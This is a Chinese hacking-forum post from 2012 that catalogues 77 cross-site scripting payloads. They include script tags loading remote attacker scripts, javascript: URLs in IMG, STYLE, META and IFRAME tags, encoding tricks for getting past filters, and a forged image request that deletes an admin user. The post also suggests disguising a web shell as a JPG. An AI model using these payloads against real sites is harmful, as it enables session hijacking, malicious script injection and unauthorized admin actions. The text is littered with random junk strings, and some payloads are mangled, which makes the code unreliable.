找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2236|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell
! v# m. I1 q9 i* pXSS跨站代码  <script>alert("")</script>/ j; D/ O+ ^( f" I
) L, Z" d1 P5 k( t
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马" K8 v- a' q5 a# Q8 ^3 v( P* h" d
! `- ^& u+ O) a

6 v0 [, @! q& U8 @
" d+ M. h9 r5 t- P; o1)普通的XSS JavaScript注入1 U* Q" y/ q: t7 F0 F2 C; x: K' I
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
5 X6 ?) c  e! G4 G: z; W% I6 o4 r) a6 x6 ~# s3 M
(2)IMG标签XSS使用JavaScript命令
) j- ?9 Q* M- a' e<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. {! n. b$ W- y3 I1 r: ~
! N, ]" u/ |* ^4 t# D
(3)IMG标签无分号无引号
* c9 X4 M; t% C<IMG SRC=javascript:alert(‘XSS’)>& x9 u* M/ n$ d( M9 J& j

$ z# E5 o3 Q% V- p7 ?' p(4)IMG标签大小写不敏感
+ K* J* x% e+ Y: I: O<IMG SRC=JaVaScRiPt:alert(‘XSS’)>1 K/ @& S4 M' Q  `+ E' ]0 C

3 B0 h8 C6 ^( J3 t) E(5)HTML编码(必须有分号)
! R3 W, I- ~/ F% C& |<IMG SRC=javascript:alert(“XSS”)>9 y" |# }3 K/ w% b

  ]5 s2 W& \( V5 l(6)修正缺陷IMG标签
7 i5 U2 Y* E4 J$ Q3 G<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 c9 h' M8 i: w  M) N/ q+ ]& L% K6 h
* v; [& e# T& _/ D
(7)formCharCode标签(计算器)3 H  W0 _) I2 j; o* t
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>2 N& l2 H% @' A% o8 e- @8 I: [
* {( l6 N- P/ [( F* \
(8)UTF-8的Unicode编码(计算器), J' T; M% g2 ]! H8 }* v$ L
<IMG SRC=jav..省略..S')>
8 N9 w  O1 e9 ^. a6 t7 x" m+ o8 x$ f
" `1 e3 C! c. s- X6 G( {(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
" D1 q6 q  D; c1 O* H* U. B<IMG SRC=jav..省略..S')>
* i; w' K  z% O/ z2 E5 b) Z' C' M" N2 e7 d
(10)十六进制编码也是没有分号(计算器)$ `3 l( E+ s3 b9 \6 ]! x
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>1 T$ {/ ?- |. P- R

* t/ @: i, X  x* \3 r9 G  H+ W5 x(11)嵌入式标签,将Javascript分开
  Z3 T. N+ b& L  r6 D: \<IMG SRC=”jav ascript:alert(‘XSS’);”>, Z' B% x# _0 B/ L) R4 d1 b
0 Z& L% k7 k7 P3 w) P( s# c
(12)嵌入式编码标签,将Javascript分开
* [/ f2 ~' L" p! }3 y! x, @4 ?7 `<IMG SRC=”jav ascript:alert(‘XSS’);”>/ H/ g0 o$ r# r4 ]9 z
4 ?, I$ z# U) m% ]3 b1 J& Z, V
(13)嵌入式换行符
8 r% i: }) c) X8 j<IMG SRC=”jav ascript:alert(‘XSS’);”>
* r# v9 q' p3 K+ [# F7 N" q! h  `
8 s3 Z# x/ o9 h" ^9 O2 ](14)嵌入式回车( v/ x+ h; A5 g
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ o; x# V+ z* y2 p' q4 y
- @; W7 m% S# u! M
(15)嵌入式多行注入JavaScript,这是XSS极端的例子% `2 R4 X! r( d+ M1 z) `4 Z. D
<IMG SRC=”javascript:alert(‘XSS‘)”>
- L, q$ y* Q0 ~( P! _
0 d7 N) S) Z- [4 T9 ~  ^# R(16)解决限制字符(要求同页面)3 K! O, v: J, V/ d4 M$ n" v" k5 {
<script>z=’document.’</script>
3 [. y+ X  F. C. z<script>z=z+’write(“‘</script>5 H. {4 f1 ]8 C, g- {" R, ?
<script>z=z+’<script’</script>
5 Q" {$ ~8 K: V: {% C! j! n+ Q) t% B<script>z=z+’ src=ht’</script>
" C+ I  x7 u4 l* T- ^7 ~<script>z=z+’tp://ww’</script>0 C3 C, K3 U% r) X( G6 i; o% X* ?
<script>z=z+’w.shell’</script>% H; ]- |/ v7 d8 z6 M% t
<script>z=z+’.net/1.’</script>
: j/ g; R4 ^1 k5 y2 _3 V<script>z=z+’js></sc’</script>
6 c$ K6 Y# P' P<script>z=z+’ript>”)’</script>' J: Z+ D! L2 N& B9 Y+ W
<script>eval_r(z)</script>9 d7 Y6 ?4 {0 E: ^( O
4 _" E, ~+ |& L) F
(17)空字符7 \7 |/ l; v2 F. |& d2 v+ R6 L
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
9 T0 H3 {1 K- ~$ E- w5 {2 H0 K# k. h+ \+ }
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
' W% J: k: ~7 G  M4 @* A3 E( N& wperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out5 ]; k9 r2 Z% a; t% h: t% \2 `8 _9 X
0 g3 t8 R( C# ?( q! B- n
(19)Spaces和meta前的IMG标签
% ~8 n; x+ C# C& u<IMG SRC=” javascript:alert(‘XSS’);”>
" A* l& T1 W% m5 U+ f/ X& Y  Z1 g% ?2 |& D$ e2 C( b
(20)Non-alpha-non-digit XSS
( _6 f! f' z$ ]; q+ E, L<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ z2 V) v# M* J' E" E. _& D

0 [  v0 G1 O0 n( E' \# Y/ s(21)Non-alpha-non-digit XSS to 2
* B8 e0 q1 W$ l- ]) E+ ?3 a6 U2 l9 Y& V<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>. f; ^$ l" w2 w- }, f' p

$ [6 t0 f6 E% `1 O3 z(22)Non-alpha-non-digit XSS to 3
  d/ {' H  T8 y# ?1 R! |<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>  C" ]; C" ]7 P7 t" ^) A" X
3 d2 ^7 Z# b4 I5 _
(23)双开括号# K- f  i" [2 ?- l- `: @, t
<<SCRIPT>alert(“XSS”);//<</SCRIPT>$ k6 ?& C- F9 f  Y8 v" z

0 M# v7 v2 y6 M% M(24)无结束脚本标记(仅火狐等浏览器)
; O+ ]  q% u$ ?2 U4 u- m) v<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>) j1 H: S" C* a. L7 W* R

0 ^5 H2 x( J4 V! V2 I(25)无结束脚本标记2
$ M, j% C% ~" c; ?  m0 e, A7 Z<SCRIPT SRC=//3w.org/XSS/xss.js>
' U' f# j7 q, }# I0 u$ o" D5 Y8 q4 J* x: j) N
(26)半开的HTML/JavaScript XSS
+ u9 X; Y, d. Q6 O9 W% c9 m" D<IMG SRC=”javascript:alert(‘XSS’)”
2 P5 B5 b, n9 H3 U) {* Y- N5 V7 c3 Q  m% ]3 _2 s9 D( v. m
(27)双开角括号
0 t$ X# g6 ^1 [  N<iframe src=http://3w.org/XSS.html <! k+ d7 ^8 E) q/ s
' }. v( M% {$ z5 |8 y8 {
(28)无单引号 双引号 分号; y; r& P/ e: {7 h: P: U6 l
<SCRIPT>a=/XSS/
0 @  W. b7 {; R2 Halert(a.source)</SCRIPT>0 K( @6 k; s% \" m, }

% ~) Y% c, S  r9 x$ P9 |(29)换码过滤的JavaScript& E0 K. R0 y8 n
\”;alert(‘XSS’);//6 W  X" H) {% ^$ z( ~1 ^
; A: o# m) ~) `3 N- \
(30)结束Title标签9 ]0 g* }$ ]9 e7 A5 A
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
7 s. n$ T3 J5 c) M' ^/ z" d0 R
* ~8 S" h4 _5 t4 `(31)Input Image) ]5 g; ^+ ]$ M1 b* b  w
<INPUT SRC=”javascript:alert(‘XSS’);”>+ l. z# y" }4 @' I
8 \" ?6 a4 I4 l& o5 S8 \. r
(32)BODY Image
1 x3 ?4 b1 u6 D4 ]- W" q<BODY BACKGROUND=”javascript:alert(‘XSS’)”>: |+ v$ p+ L' t* Y

& k) _7 v6 R& W" h( \2 M3 B) ?4 J, E(33)BODY标签
# q: B  a1 M) T7 ]! H7 a. U/ h<BODY(‘XSS’)>- c9 _0 Y' L8 R' s$ R

" K& {4 Z' w7 I5 s(34)IMG Dynsrc
% d1 ^  p( U; n! P, W4 U<IMG DYNSRC=”javascript:alert(‘XSS’)”>, a/ m/ S9 G  i- [% v: m3 E
9 f. D. E# ?: X- x
(35)IMG Lowsrc
6 k# N2 W+ W. ~, T4 ?6 g  Q  G<IMG LOWSRC=”javascript:alert(‘XSS’)”>3 q+ f' h2 \) G* Z. N

: O+ n1 b' K& c& a* E5 Q(36)BGSOUND
& J( e: g/ N, k+ D2 V1 O# @<BGSOUND SRC=”javascript:alert(‘XSS’);”>
, `: t" _8 V) ?, ^/ }  J1 J/ b/ P0 j8 @% Y0 j: K
(37)STYLE sheet
7 z) \5 s2 w( _7 v<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 g6 J) R; `: M: B( F+ O
& E4 d8 |- h9 H! Y* [; _% C(38)远程样式表
; F" X8 C) ^0 P/ p<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>) d% a: X+ }1 g" i8 o. M

8 r- x- d5 P1 J7 p  C(39)List-style-image(列表式)4 T8 r8 |' F: {. l- A9 Q
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; R" f1 Z* ^& y1 t  n8 [2 E8 {5 G+ `* W, F0 l) l2 y6 z. ]
(40)IMG VBscript
$ [7 E3 M" U$ P* C<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
: @- h4 K/ T. _  W1 g) S. R% [8 N0 \  l; m
(41)META链接url1 ?% k: u) D; |$ j
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>2 c$ L3 P- `/ ?; V$ h
; h0 r$ G  P; d
(42)Iframe
* h4 q/ F) Q( ^1 L5 G: @. b6 E<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- z: u0 c: g7 _. x. |6 H(43)Frame
- `, [" T$ W) L0 z<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>0 H+ P% l' F- W+ m) q
% `" D8 r7 p; b
(44)Table
/ r; H8 _0 _& ~. N: Q<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>: l+ d- @. z% c; ?  ~% M

5 J* ^# ^3 Y; v1 z; D1 s0 f+ S(45)TD7 h" T; E/ ^7 A$ i$ O- T
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
( V% P3 w! l$ L4 ^; A' u9 Q2 w1 k2 l; w) j$ s% b( T
(46)DIV background-image4 d8 E* G/ r- I% K6 b. Q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 K, u  `" ]0 |- V+ g

* R. `6 Q, z# f. Y) T) H" g(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). L; S" g/ T2 x( [, O
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
8 k# P8 Y  o. D' e
4 [8 h. ]  {! t* H4 y* i(48)DIV expression2 w0 ]0 P; M. c' Z! U$ g
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>5 r9 q. _. \5 T/ R4 D' V& h
  w! C- r2 b- l  s, s
(49)STYLE属性分拆表达
8 g7 f5 o' ?: A! r) L<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ X& P# s% B$ n
- z; O1 R* ?: ?: E5 r8 R(50)匿名STYLE(组成:开角号和一个字母开头)
" {0 n1 B! B  C) D6 h# v( ~<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>' P: l+ ]+ l2 f  I7 Z* y; d' I

, S4 \: _' Y: `(51)STYLE background-image% k0 \. B- p' }# x3 D* @
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>7 A# J  E. u9 o7 v/ H) x9 x1 S
( j  C8 z( f1 P& A  X) T( D* D
(52)IMG STYLE方式0 f  _. p& G: K
exppression(alert(“XSS”))’>) P* |' S+ ?5 Z5 r% O8 ~- p

: c( a( r8 P1 l3 S  e3 n* I$ E(53)STYLE background4 ^! F# v  W# k+ L) c% C$ w6 ]
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- R  @' m: H7 X! a; C1 [& Z
" u0 G* x+ Q7 I( G
(54)BASE
9 l7 a: o7 _1 V: h" N$ F7 K& v<BASE HREF=”javascript:alert(‘XSS’);//”>/ P$ d: K4 S: |7 q; K

. b8 t. a, E! h! P(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, t* `: J$ f( r: R0 x7 w1 K# I- \<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>' a2 p3 p& k( v8 W' ?

% t6 \2 p4 y& z) e6 I/ x(56)在flash中使用ActionScrpt可以混进你XSS的代码
. T9 l; L# k2 P& k( \$ K# La=”get”;3 Q; A- S) L4 L4 q4 Z0 [
b=”URL(\”";
/ H0 B0 d% [! M9 v8 qc=”javascript:”;
4 w' U, `) R/ P9 N$ jd=”alert(‘XSS’);\”)”;$ c  C, u$ H9 Y7 _
eval_r(a+b+c+d);: ^1 v5 E" Q) }3 E' V% i' |/ `8 R

0 ]& |3 n; [+ S1 I' N(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 V. K8 p: {& Z$ P<HTML xmlns:xss>7 ]* c! Z; f9 m, h
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
, j8 A  P' K6 o& Z) o<xss:xss>XSS</xss:xss>  i2 W' F+ p3 L& z7 f0 d
</HTML>
6 J: U9 A& N2 q* ~: y# M7 D7 i# V2 J2 _( v; ]
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
  I3 M3 l8 t) D. i) l<SCRIPT SRC=””></SCRIPT>* i0 N' p: k, F! m. t
* Z3 A; ]# Y0 C4 q8 B# M
(59)IMG嵌入式命令,可执行任意命令
5 Q; @6 ^2 X$ ^+ o; i) o<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' N9 W# F- i! y- t1 L( v1 C; P' p! E& m
(60)IMG嵌入式命令(a.jpg在同服务器)& K6 q+ H' V+ q; y% I
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 N" t7 K4 Y* A/ e# M6 W# m8 Z0 F% D! w  Z# e
(61)绕符号过滤3 i- |4 T) u3 q2 m! |8 Y
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
: L, Q0 a7 W! z: V  G, G
9 T  V+ o7 Y" q( i: }: y(62)" r+ U- R" K  o" K5 g+ ~
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT># ]1 {: I. o1 J3 G
* }6 \# ^" w5 D1 A& @
(63)3 U0 f: g/ T, W; a1 @
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>; E* e6 @- s' F# G* Y; d

2 V9 Q+ b+ c# v(64)5 f5 w5 d1 F/ N" c
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
$ L6 e$ _; f0 @- P2 Z* r% N& D& m
(65)3 A  f& h" m& h5 \
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>: X- R2 V* l, S1 G

9 \3 d' q9 G: d) p(66)1 T' v6 ^6 Z4 [6 {6 N  m+ ?9 w8 F
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>: j; ?" Z4 n/ {

, ]; ^, i  Q  a, O9 o- r(67)
  E9 S" _# H+ H6 _& q<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>1 @' y- o; C$ s7 T$ n9 _

) |. _! K0 [6 ^. x6 }(68)URL绕行
( k# Z+ o9 |& V, e1 v<A HREF=”http://127.0.0.1/”>XSS</A>* x9 O  ?9 X% i

) J9 K  w2 B9 Q(69)URL编码
' R: d! n( ]1 p. o* A. l<A HREF=”http://3w.org”>XSS</A>
7 E! S. T3 t* j! m$ i9 n) h, ^
9 K; G! j5 C5 S$ z& z7 h" q(70)IP十进制/ E5 h) L% H9 r2 W& z
<A HREF=”http://3232235521″>XSS</A>' ^/ |; j; J+ m" e& F
( T# m& p/ z0 m# T7 P
(71)IP十六进制
& ~) p  D/ ~) J7 _" t- q( [0 p7 p<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
. q* z" D+ E7 Q5 H* z0 s8 ]/ ^
- S6 A+ t: {& s, [6 |(72)IP八进制7 [. b! s. D- e9 x
<A HREF=”http://0300.0250.0000.0001″>XSS</A>  o! n/ F1 D) ^; a! r0 v3 h7 H

. C3 `" u, w: ~1 _(73)混合编码' w6 z2 \( l5 {/ p2 i
<A HREF=”h
: a2 M' I1 x5 Y& v; H! u6 gtt p://6 6.000146.0×7.147/”">XSS</A>
, Y- {/ n+ H& X$ P7 @) V6 a  h# k6 _3 \! D# }
(74)节省[http:]
6 Q5 x9 F) g6 q# J  n8 Y: n3 f# E<A HREF=”//www.google.com/”>XSS</A>
* e/ X7 y0 q# G5 h
5 y% o; q! D& l" N8 X4 V(75)节省[www]6 M( b' @0 ^6 i, i7 h/ j5 ^
<A HREF=”http://google.com/”>XSS</A>
! M4 O. Y! m! S7 c$ l' I1 ?5 c6 p; s1 e) }! ?4 ?' f! d
(76)绝对点绝对DNS
- g2 b3 k" T; B, v<A HREF=”http://www.google.com./”>XSS</A>5 l; i6 {$ ]2 ~

( {$ z8 ~# {7 e+ k- K; E(77)javascript链接6 m6 H' d5 S  P% i8 E3 J/ a2 o- G4 f! z
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>( c' _, z* n4 L* w$ W0 m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表